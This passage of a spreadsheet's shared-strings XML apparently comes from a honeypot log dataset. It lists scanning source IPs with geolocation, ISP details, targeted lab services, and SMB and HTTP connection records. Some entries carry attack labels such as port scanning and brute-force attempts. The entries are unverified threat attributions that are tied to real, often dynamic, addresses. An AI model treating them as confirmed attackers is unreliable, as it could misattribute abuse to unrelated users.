    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (198.44.174.84,51162)}&amp;&amp;{Data_SMB:Incoming connection (198.44.174.84,53068)}&amp;&amp;{Data_SMB:Incoming connection (198.44.174.84,53437)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (198.44.174.84,50977)}&amp;&amp;{Data_SMB:Incoming connection (198.44.174.84,51064)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (198.44.174.84,58420)}&amp;&amp;{Data_SMB:Incoming connection (198.44.174.84,58493)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (198.44.174.84,59786)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}</t>
  </si>
  <si>
    <t>::ffff:c62c:ae54</t>
  </si>
  <si>
    <t>532c084027b18f59716a64a433714c08</t>
  </si>
  <si>
    <t>114.38.2.207</t>
  </si>
  <si>
    <t>114-38-2-207.dynamic-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:7226:2cf</t>
  </si>
  <si>
    <t>7b899d0bdeedd10585ab4bde582dd0d1</t>
  </si>
  <si>
    <t>43.246.140.197</t>
  </si>
  <si>
    <t>HP</t>
  </si>
  <si>
    <t>Himachal Pradesh</t>
  </si>
  <si>
    <t>Sirmaur</t>
  </si>
  <si>
    <t>Nāhan</t>
  </si>
  <si>
    <t>1262151</t>
  </si>
  <si>
    <t>173001</t>
  </si>
  <si>
    <t>30.5575</t>
  </si>
  <si>
    <t>77.2908</t>
  </si>
  <si>
    <t>134294</t>
  </si>
  <si>
    <t>R P World Telecom Pvt Ltd</t>
  </si>
  <si>
    <t>2015-08-19</t>
  </si>
  <si>
    <t>RPWORLDTELECOM</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (43.246.140.197,51518)}&amp;&amp;{Data_SMB:Incoming connection (43.246.140.197,51858)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (43.246.140.197,52037)}&amp;&amp;{Data_SMB:Incoming connection (43.246.140.197,52409)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (43.246.140.197,51095)}&amp;&amp;{Data_SMB:Incoming connection (43.246.140.197,51429)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (43.246.140.197,55255)}&amp;&amp;{Data_SMB:Incoming connection (43.246.140.197,55735)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:2bf6:8cc5</t>
  </si>
  <si>
    <t>The attacker is probing and scanning the system for vulnerable services, attempting to exploit them through various protocols such as FTP, HTTP, HTTPS, LDAP, MSSQL, MYSQL, NTP, SNMP, and SMB. They are also trying to establish connections and gain unauthorized access.</t>
  </si>
  <si>
    <t>NCRACK ATTACK</t>
  </si>
  <si>
    <t>fb9ed82ea8c0cf9d8d412f42937757c3</t>
  </si>
  <si>
    <t>180.247.46.164</t>
  </si>
  <si>
    <t>ST</t>
  </si>
  <si>
    <t>Central Sulawesi</t>
  </si>
  <si>
    <t>Kota Palu</t>
  </si>
  <si>
    <t>Palu</t>
  </si>
  <si>
    <t>1633034</t>
  </si>
  <si>
    <t>-0.90833</t>
  </si>
  <si>
    <t>119.871</t>
  </si>
  <si>
    <t>telkomnet-as-ap</t>
  </si>
  <si>
    <t>Pt. Telkom Indonesia</t>
  </si>
  <si>
    <t>::ffff:b4f7:2ea4</t>
  </si>
  <si>
    <t>The attacker is scanning and probing various services on the network, likely in an attempt to identify vulnerable systems that can be exploited for further attacks. They are attempting to gather information about the network infrastructure, including IP addresses, service versions, and configuration details. The attacker may also be using these probes as a reconnaissance step before launching more targeted attacks. &amp;&amp; The attacker is attempting to scan and exploit various services on the network, including DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, IRC, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, and TELNET. The attacker is sending requests to these services in an attempt to gain unauthorized access or retrieve sensitive information.</t>
  </si>
  <si>
    <t>Port scanning and exploitation</t>
  </si>
  <si>
    <t>42e148e19b03ffa4eb1b36f1bf5f67b9</t>
  </si>
  <si>
    <t>218.250.243.106</t>
  </si>
  <si>
    <t>NA&amp;&amp;n218250243106.netvigator.com</t>
  </si>
  <si>
    <t>Pccw IMS</t>
  </si>
  <si>
    <t>PCCW Limited</t>
  </si>
  <si>
    <t>2004-07-20</t>
  </si>
  <si>
    <t>::ffff:dafa:f36a</t>
  </si>
  <si>
    <t>a4ab2a65a9fc972974d00a403934aeab</t>
  </si>
  <si>
    <t>27.74.70.185</t>
  </si>
  <si>
    <t>Newass2011xDSLHN</t>
  </si>
  <si>
    <t>::ffff:1b4a:46b9</t>
  </si>
  <si>
    <t>42c59aeaabf12f5a016c93697c9beac4</t>
  </si>
  <si>
    <t>181.120.128.19</t>
  </si>
  <si>
    <t>Paraguay</t>
  </si>
  <si>
    <t>Central Department</t>
  </si>
  <si>
    <t>San Lorenzo</t>
  </si>
  <si>
    <t>Fernando de la Mora (Fernando Zona Sur)</t>
  </si>
  <si>
    <t>3438115</t>
  </si>
  <si>
    <t>-25.3288</t>
  </si>
  <si>
    <t>-57.565</t>
  </si>
  <si>
    <t>23201</t>
  </si>
  <si>
    <t>Telecel S.A.</t>
  </si>
  <si>
    <t>Telecel S.A</t>
  </si>
  <si>
    <t>::ffff:b578:8013</t>
  </si>
  <si>
    <t>243330f48b0dcd841909492b075a6e8f</t>
  </si>
  <si>
    <t>2.187.32.148</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_HTTP_H22</t>
  </si>
  <si>
    <t>23&amp;&amp;80</t>
  </si>
  <si>
    <t>04</t>
  </si>
  <si>
    <t>West Azerbaijan</t>
  </si>
  <si>
    <t>Urmia</t>
  </si>
  <si>
    <t>121801</t>
  </si>
  <si>
    <t>37.5519</t>
  </si>
  <si>
    <t>45.0555</t>
  </si>
  <si>
    <t>AZARBAIJAN TELECOMMUNICATION, COMPANY</t>
  </si>
  <si>
    <t>West Azarbaijan Telecommunication, Company</t>
  </si>
  <si>
    <t>{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Content-Length': '0', 'Host': '38.60.209.6:80', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Content-Length': '0', 'Host': '38.60.209.6:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:2bb:2094</t>
  </si>
  <si>
    <t>7ec94af16524d962fe27b65b02e30332</t>
  </si>
  <si>
    <t>218.157.221.9</t>
  </si>
  <si>
    <t>::ffff:da9d:dd09</t>
  </si>
  <si>
    <t>9b8e5c0a06e557931207bca058090519</t>
  </si>
  <si>
    <t>179.211.209.169</t>
  </si>
  <si>
    <t>Belém</t>
  </si>
  <si>
    <t>3405870</t>
  </si>
  <si>
    <t>-1.45583</t>
  </si>
  <si>
    <t>-48.5044</t>
  </si>
  <si>
    <t>::ffff:b3d3:d1a9</t>
  </si>
  <si>
    <t>c2da53e5ff0a09ad56efcc1f1b19acd3</t>
  </si>
  <si>
    <t>103.93.112.148</t>
  </si>
  <si>
    <t>1433&amp;&amp;445&amp;&amp;59555&amp;&amp;60125</t>
  </si>
  <si>
    <t>Udam Singh Nagar</t>
  </si>
  <si>
    <t>Rudrapur (Awas Vikas)</t>
  </si>
  <si>
    <t>8740322</t>
  </si>
  <si>
    <t>28.9876</t>
  </si>
  <si>
    <t>79.4044</t>
  </si>
  <si>
    <t>Dehradun Enet Solutions Pvt ltd</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.93.112.148,63684)}&amp;&amp;{Data_SMB:Incoming connection (103.93.112.148,64327)}&amp;&amp;{Data_SMB:Incoming connection (103.93.112.148,61572)}&amp;&amp;{Data_SMB:Incoming connection (103.93.112.148,62228)}&amp;&amp;{Data_SMB:Incoming connection (103.93.112.148,58318)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.93.112.148,61967)}&amp;&amp;{Data_SMB:Incoming connection (103.93.112.148,62640)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;NA&amp;&amp;{Data_SMB:Incoming connection (103.93.112.148,59555)}&amp;&amp;{Data_SMB:Incoming connection (103.93.112.148,60125)}&amp;&amp;{Data_SMB:Incoming connection (103.93.112.148,53246)}&amp;&amp;{Data_SMB:Incoming connection (103.93.112.148,53842)}&amp;&amp;{Data_SMB:Incoming connection (103.93.112.148,49535)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:675d:7094</t>
  </si>
  <si>
    <t>bf46004c5e7040bd6dc24b5e4e9a283a</t>
  </si>
  <si>
    <t>86.233.151.155</t>
  </si>
  <si>
    <t>NA&amp;&amp;lfbn-poi-1-188-155.w86-233.abo.wanadoo.fr</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>::ffff:56e9:979b</t>
  </si>
  <si>
    <t>14f43c30cc3cfd911d6b4442b309d713</t>
  </si>
  <si>
    <t>175.101.131.164</t>
  </si>
  <si>
    <t>Hyderabad (Banjara Hills)</t>
  </si>
  <si>
    <t>500034</t>
  </si>
  <si>
    <t>17.4237</t>
  </si>
  <si>
    <t>78.4277</t>
  </si>
  <si>
    <t>17754</t>
  </si>
  <si>
    <t>Excellmedia</t>
  </si>
  <si>
    <t>ExcellMedia Pvt Ltd</t>
  </si>
  <si>
    <t>Excell Media Pvt Ltd</t>
  </si>
  <si>
    <t>::ffff:af65:83a4</t>
  </si>
  <si>
    <t>e4a28e96260986f4a2a80cec1dc255bc</t>
  </si>
  <si>
    <t>103.83.11.130</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H22&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_SMB_H2</t>
  </si>
  <si>
    <t>Rudrapur (Jain Colony)</t>
  </si>
  <si>
    <t>28.9807</t>
  </si>
  <si>
    <t>79.389</t>
  </si>
  <si>
    <t>136698</t>
  </si>
  <si>
    <t>Devdarpan Broadband Pvt. Ltd.</t>
  </si>
  <si>
    <t>2017-01-09</t>
  </si>
  <si>
    <t>DEVDRPAN</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.83.11.130,62356)}</t>
  </si>
  <si>
    <t>::ffff:6753:b82</t>
  </si>
  <si>
    <t>c0149affe47af0adf80dc549b4dbddb3</t>
  </si>
  <si>
    <t>49.36.210.240</t>
  </si>
  <si>
    <t>395003</t>
  </si>
  <si>
    <t>21.1702</t>
  </si>
  <si>
    <t>72.8311</t>
  </si>
  <si>
    <t>RJIL North FTTX PUBLIC</t>
  </si>
  <si>
    <t>::ffff:3124:d2f0</t>
  </si>
  <si>
    <t>d0b79ae8b8c644c962317cb3ab84a91d</t>
  </si>
  <si>
    <t>117.244.205.47</t>
  </si>
  <si>
    <t>::ffff:75f4:cd2f</t>
  </si>
  <si>
    <t>eb663f9b29de3522eecbc47cc244652a</t>
  </si>
  <si>
    <t>103.56.197.14</t>
  </si>
  <si>
    <t>Nagpur</t>
  </si>
  <si>
    <t>1262180</t>
  </si>
  <si>
    <t>21.1463</t>
  </si>
  <si>
    <t>79.0849</t>
  </si>
  <si>
    <t>55341</t>
  </si>
  <si>
    <t>51/A RACHNA MIDAS GOKULPETH</t>
  </si>
  <si>
    <t>Fribzi Multi Technologies Pvt. Ltd</t>
  </si>
  <si>
    <t>::ffff:6738:c50e</t>
  </si>
  <si>
    <t>8cbbaa548e1af4f07456b9ef408dfeac</t>
  </si>
  <si>
    <t>95.103.203.173</t>
  </si>
  <si>
    <t>NA&amp;&amp;bband-dyn173.95-103-203.t-com.sk</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44</t>
  </si>
  <si>
    <t>SK</t>
  </si>
  <si>
    <t>Slovakia</t>
  </si>
  <si>
    <t>TC</t>
  </si>
  <si>
    <t>Trenčín Region</t>
  </si>
  <si>
    <t>Považská Bystrica District</t>
  </si>
  <si>
    <t>Považská Bystrica</t>
  </si>
  <si>
    <t>3058060</t>
  </si>
  <si>
    <t>49.1215</t>
  </si>
  <si>
    <t>18.4217</t>
  </si>
  <si>
    <t>6855</t>
  </si>
  <si>
    <t>Slovak Telekom, a.s.</t>
  </si>
  <si>
    <t>Slovak Telecom AS6855</t>
  </si>
  <si>
    <t>::ffff:5f67:cbad</t>
  </si>
  <si>
    <t>16875c2e5c0c8a615190a56b3fca2aa7</t>
  </si>
  <si>
    <t>218.189.137.98</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H17</t>
  </si>
  <si>
    <t>Tsing Yi</t>
  </si>
  <si>
    <t>::ffff:dabd:8962</t>
  </si>
  <si>
    <t>fd465204368df8799639c17f999874ce</t>
  </si>
  <si>
    <t>131.100.136.93</t>
  </si>
  <si>
    <t>Cássia</t>
  </si>
  <si>
    <t>3466752</t>
  </si>
  <si>
    <t>-20.5831</t>
  </si>
  <si>
    <t>-46.9219</t>
  </si>
  <si>
    <t>61638</t>
  </si>
  <si>
    <t>Impactnet Telecomunicacoes LTDA</t>
  </si>
  <si>
    <t>::ffff:8364:885d</t>
  </si>
  <si>
    <t>449b35a024a24d82b4bb08a5791db47f</t>
  </si>
  <si>
    <t>195.64.252.176</t>
  </si>
  <si>
    <t>53</t>
  </si>
  <si>
    <t>Poltava</t>
  </si>
  <si>
    <t>Kremenchuk Raion</t>
  </si>
  <si>
    <t>Hradyzk</t>
  </si>
  <si>
    <t>708210</t>
  </si>
  <si>
    <t>49.2394</t>
  </si>
  <si>
    <t>33.1394</t>
  </si>
  <si>
    <t>41229</t>
  </si>
  <si>
    <t>Lushchan Evgenij Ivanovich</t>
  </si>
  <si>
    <t>uavisti LikoNet</t>
  </si>
  <si>
    <t>::ffff:c340:fcb0</t>
  </si>
  <si>
    <t>d2f413aca1ce2a0b17741be9777600a5</t>
  </si>
  <si>
    <t>103.214.190.149</t>
  </si>
  <si>
    <t>::ffff:67d6:be95</t>
  </si>
  <si>
    <t>935059c4b6d226cbb5d50b7bf27ade1c</t>
  </si>
  <si>
    <t>117.194.151.23</t>
  </si>
  <si>
    <t>::ffff:75c2:9717</t>
  </si>
  <si>
    <t>55a4b18eef7c1e4c780dd9d3dae6d5b5</t>
  </si>
  <si>
    <t>171.225.139.154</t>
  </si>
  <si>
    <t>::ffff:abe1:8b9a</t>
  </si>
  <si>
    <t>ebbc49b21918b3d53f1ac3b6715e42be</t>
  </si>
  <si>
    <t>115.244.189.50</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;10554&amp;&amp;3306&amp;&amp;1433</t>
  </si>
  <si>
    <t>::ffff:73f4:bd32</t>
  </si>
  <si>
    <t>1d78eacbc7512d121818dddcbe8fcc5c</t>
  </si>
  <si>
    <t>101.109.167.30</t>
  </si>
  <si>
    <t>Ratchathewi</t>
  </si>
  <si>
    <t>7026885</t>
  </si>
  <si>
    <t>13.759</t>
  </si>
  <si>
    <t>100.534</t>
  </si>
  <si>
    <t>::ffff:656d:a71e</t>
  </si>
  <si>
    <t>fc8d3e38613652b23bf93098d23a7b17</t>
  </si>
  <si>
    <t>45.127.89.151</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;52157&amp;&amp;1433&amp;&amp;3306&amp;&amp;445</t>
  </si>
  <si>
    <t>Murud</t>
  </si>
  <si>
    <t>1262403</t>
  </si>
  <si>
    <t>18.3282</t>
  </si>
  <si>
    <t>72.9621</t>
  </si>
  <si>
    <t>55352</t>
  </si>
  <si>
    <t>Microscan Internet Limited</t>
  </si>
  <si>
    <t>Microscan ISP</t>
  </si>
  <si>
    <t>Skandha Networks LLP</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (45.127.89.151,59504)}&amp;&amp;{Data_SMB:Incoming connection (45.127.89.151,50466)}&amp;&amp;{Data_SMB:Incoming connection (45.127.89.151,50992)}</t>
  </si>
  <si>
    <t>::ffff:2d7f:5997</t>
  </si>
  <si>
    <t>e4776ecaaa09542d418e1de59d08f2b3</t>
  </si>
  <si>
    <t>117.251.99.163</t>
  </si>
  <si>
    <t>::ffff:75fb:63a3</t>
  </si>
  <si>
    <t>2cb86bf08c6070069f62618978d29556</t>
  </si>
  <si>
    <t>103.171.246.119</t>
  </si>
  <si>
    <t>22.5626</t>
  </si>
  <si>
    <t>88.363</t>
  </si>
  <si>
    <t>Sweety</t>
  </si>
  <si>
    <t>2021-08-18</t>
  </si>
  <si>
    <t>SWEETY</t>
  </si>
  <si>
    <t>::ffff:67ab:f677</t>
  </si>
  <si>
    <t>4ea9821a619df70dcbe93c03bed432ed</t>
  </si>
  <si>
    <t>217.209.11.246</t>
  </si>
  <si>
    <t>217-209-11-246-no600.tbcn.telia.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>O</t>
  </si>
  <si>
    <t>Västra Götaland</t>
  </si>
  <si>
    <t>Lidköping Municipality</t>
  </si>
  <si>
    <t>Lidköping</t>
  </si>
  <si>
    <t>2696329</t>
  </si>
  <si>
    <t>531 01</t>
  </si>
  <si>
    <t>58.5035</t>
  </si>
  <si>
    <t>13.1571</t>
  </si>
  <si>
    <t>3301</t>
  </si>
  <si>
    <t>Telia Company AB</t>
  </si>
  <si>
    <t>Telia Network Services</t>
  </si>
  <si>
    <t>::ffff:d9d1:bf6</t>
  </si>
  <si>
    <t>96979117a322192204af90b2dd3aca65</t>
  </si>
  <si>
    <t>222.102.191.146</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_SSH_H26&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H12</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;24774&amp;&amp;NA&amp;&amp;60974&amp;&amp;53058</t>
  </si>
  <si>
    <t>::ffff:de66:bf92</t>
  </si>
  <si>
    <t>ef0085174417d299c15898c26b884cae</t>
  </si>
  <si>
    <t>103.72.169.219</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MT-CPA_H31</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;3306&amp;&amp;19865&amp;&amp;1433&amp;&amp;32229&amp;&amp;445&amp;&amp;62862&amp;&amp;62856</t>
  </si>
  <si>
    <t>Ludhiana (Aggar Nagar - B Block)</t>
  </si>
  <si>
    <t>30.8869</t>
  </si>
  <si>
    <t>75.7909</t>
  </si>
  <si>
    <t>Himachal Future Cable And Datacom Private Limited</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (103.72.169.219,58214)}&amp;&amp;{Data_SMB:Incoming connection (103.72.169.219,2461)}</t>
  </si>
  <si>
    <t>::ffff:6748:a9db</t>
  </si>
  <si>
    <t>aadd9fcdcc078484dcd2334d7a00ca1a</t>
  </si>
  <si>
    <t>195.18.16.222</t>
  </si>
  <si>
    <t>Crimea</t>
  </si>
  <si>
    <t>Simferopol Raion</t>
  </si>
  <si>
    <t>Simferopol</t>
  </si>
  <si>
    <t>693805</t>
  </si>
  <si>
    <t>44.9521</t>
  </si>
  <si>
    <t>34.1024</t>
  </si>
  <si>
    <t>48004</t>
  </si>
  <si>
    <t>PE Tsibrankov Konstantin Igorevich</t>
  </si>
  <si>
    <t>KCT</t>
  </si>
  <si>
    <t>::ffff:c312:10de</t>
  </si>
  <si>
    <t>2d2a38ef00793b7a4d2a319c861edb9d</t>
  </si>
  <si>
    <t>91.90.40.155</t>
  </si>
  <si>
    <t>s919040155.blix.com</t>
  </si>
  <si>
    <t>59.9139</t>
  </si>
  <si>
    <t>10.7522</t>
  </si>
  <si>
    <t>50304</t>
  </si>
  <si>
    <t>Blix Solutions AS</t>
  </si>
  <si>
    <t>Blix Solutions</t>
  </si>
  <si>
    <t>Blixcust10412</t>
  </si>
  <si>
    <t>2006-11-03</t>
  </si>
  <si>
    <t>1997-02-03 05:00:00</t>
  </si>
  <si>
    <t>2033-02-04 05:00:00</t>
  </si>
  <si>
    <t>2023-10-06 08:20:58</t>
  </si>
  <si>
    <t>['N.BLIX.EU', 'NS1.BLIX.COM', 'NS2.BLIX.COM', 'S.BLIX.EU']</t>
  </si>
  <si>
    <t>CSL Computer Service Langenbach GmbH d/b/a joker.com</t>
  </si>
  <si>
    <t>['abuse@joker.com', 'support@blixsolutions.no']</t>
  </si>
  <si>
    <t>::ffff:5b5a:289b</t>
  </si>
  <si>
    <t>f156e361c4feafb1bdf50379a1a029be</t>
  </si>
  <si>
    <t>114.10.44.121</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H44</t>
  </si>
  <si>
    <t>Kota Semarang</t>
  </si>
  <si>
    <t>Semarang</t>
  </si>
  <si>
    <t>1627896</t>
  </si>
  <si>
    <t>-6.99306</t>
  </si>
  <si>
    <t>110.421</t>
  </si>
  <si>
    <t>4761</t>
  </si>
  <si>
    <t>PT. INDOSAT Tbk</t>
  </si>
  <si>
    <t>IOH B2B</t>
  </si>
  <si>
    <t>2008-04-14</t>
  </si>
  <si>
    <t>IOH-B2B-ID</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (114.10.44.121,65289)}&amp;&amp;{Data_SMB:Incoming connection (114.10.44.121,19469)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:720a:2c79</t>
  </si>
  <si>
    <t>324df14104c6f28bcddf589949b49b59</t>
  </si>
  <si>
    <t>115.245.208.140</t>
  </si>
  <si>
    <t>::ffff:73f5:d08c</t>
  </si>
  <si>
    <t>8f4b7d735c1f477768eb818ed34fbecf</t>
  </si>
  <si>
    <t>103.144.227.162</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H21</t>
  </si>
  <si>
    <t>Barru Regency</t>
  </si>
  <si>
    <t>Barru</t>
  </si>
  <si>
    <t>1649976</t>
  </si>
  <si>
    <t>-4.412</t>
  </si>
  <si>
    <t>119.618</t>
  </si>
  <si>
    <t>PT. Indonesia Comnets Plus</t>
  </si>
  <si>
    <t>2019-11-05</t>
  </si>
  <si>
    <t>IDNIC-LUGA-ID</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.144.227.162,64302)}&amp;&amp;{Data_SMB:Incoming connection (103.144.227.162,44003)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.144.227.162,44061)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:6790:e3a2</t>
  </si>
  <si>
    <t>67f79c81d08a1992f14c1d7f836b0ddf</t>
  </si>
  <si>
    <t>81.91.232.98</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H34&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_SMB_H10&amp;&amp;SMA-LAB_SMB_H27&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_SMB_H34</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;18344&amp;&amp;1433&amp;&amp;445</t>
  </si>
  <si>
    <t>BJ</t>
  </si>
  <si>
    <t>Benin</t>
  </si>
  <si>
    <t>Littoral</t>
  </si>
  <si>
    <t>Cotonou</t>
  </si>
  <si>
    <t>Cotonou (Cadjèhoun)</t>
  </si>
  <si>
    <t>2394819</t>
  </si>
  <si>
    <t>6.35275</t>
  </si>
  <si>
    <t>2.42299</t>
  </si>
  <si>
    <t>328228</t>
  </si>
  <si>
    <t>SOCIETE BENINOISE D'INFRASTRUCTURES NUMERIQUES</t>
  </si>
  <si>
    <t>Benin Telecoms Infrastructures SA</t>
  </si>
  <si>
    <t>2010-03-11</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (81.91.232.98,39585)}&amp;&amp;{Data_SMB:Incoming connection (81.91.232.98,7073)}&amp;&amp;{Data_SMB:Incoming connection (81.91.232.98,7937)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (81.91.232.98,35105)}&amp;&amp;{Data_SMB:Incoming connection (81.91.232.98,36033)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (81.91.232.98,51553)}&amp;&amp;{Data_SMB:Incoming connection (81.91.232.98,52161)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE 